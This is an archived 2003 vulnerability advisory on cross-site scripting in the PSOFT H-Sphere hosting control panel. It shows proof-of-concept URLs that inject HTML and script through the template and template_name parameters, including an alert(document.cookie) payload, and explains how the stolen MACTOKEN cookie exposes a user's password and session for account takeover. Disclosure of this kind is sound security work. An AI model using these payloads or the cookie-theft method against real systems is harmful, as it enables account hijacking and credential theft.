--------------------
Product: PSOFT H-Sphere ( Hosting Control Panel )
Vendor: PSOFT ( Positive Software Corporation )
Versions:
VULNERABLE
- 2.3.x
- 2.2.x
- 2.1.x
- 2.0.x
NOT VULNERABLE
- ?
---------------------
Description:
H-Sphere is a scalable multiserver webhosting control panel, which provides
complete hosting automation for Linux, BSD & Win2000 platforms, is easy to
use, and has extensive user interface, billing solution, and integrated
trouble tickets system
-----------------------------------------
SECURITY HOLES FOUND and PROOFS OF CONCEPT:
-----------------------------------------
I encountered a lot of XSS ( Cross Site Scripting ) vulnerabilities in the
PSOFT's product called H-Sphere , located in the template inclusion system.
The failure is in the form that the template system includes a html template
page,
if the page does not exist the system prints an error like this:
Unknown template : '[PATH TO NON EXISTENT TEMPLATE PAGE]'
with this you can insert html and script code by url command passing like
this:
http://[TARGET]/[PATH TO PSOFT H-SPHERE
INSTALLATION]/servlet/psoft.hsphere.CP/[VALID AND LOGGED USER]/[ID]/[PATH OF
H-SPHERE USER SCRIPTS]/servlet/psoft.hsphere.CP?template_name=[HERE COMES
YOUR CODE]
The new error page prints this:
Unknown template : '[HERE COMES YOUR CODE]'
And the user web navigator executes all the code and scripts included in the
new error page.
This can be used for steal user cookies like this:
MACTOKEN=[USER]|0000000xxxxxx|0xxxxx0000xxxx0000xxxx0000xxxx00
ESTRUCTURE OF H-SPHERE COOKIE :
MACTOKEN=[USERNAME] | [ USER PASSWORD ] | [ USER SESSION ID ]
You can modify your cookie of h-sphere according the stealed user cookie and
use the system with
the user credentials , think in modify user hosting plans... ;-) .
Please , all the time the user must be logged in valid or the attacker must
use a specially crafted url for
include commands in the client side trought the template system.I think in
some public urls...
--------------
SAMPLES
--------------
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP?action=login&ftemplate=[MORE CODE AND
XSS]&requestURL="><h1>XSS%20in%20PSOFT%20SPHERE<a%20href="&login=[USERNAME]&
password=[PASSWORD]
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<H1>xss</H1>
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<IFRAME>
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<h1>XSS
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<script>alert(document.cookie);</script>
All urls that use the template and ftemplate / template_name url input are
affected by this type of XSS attack .
-------------------------
| CONCLUSIONS AND NOTES |
-------------------------
All the urls that use this template incluion input are affected by this
hole.
User data and cookies can be stoolen by this without permission.
In some conditions we can pass server-based commands.
The server can pick up sending specially crafted urls and input values .
We can enter other-user domain configurations passing an specific domain id
value.
- I test this in the official psoft demo and run but recently they change
the demo and don't allow me to enter the system.
The system says a Generic Error . ;-).
-----------
| CONTACT |
-----------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--Nova Projects Professional Coding--
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
www.novappc.com
security.novappc.com
www.lorenzohgh.com
______________________
This archive was generated by hypermail 2b30 : Mon Jun 09 2003 - 13:18:38 PDT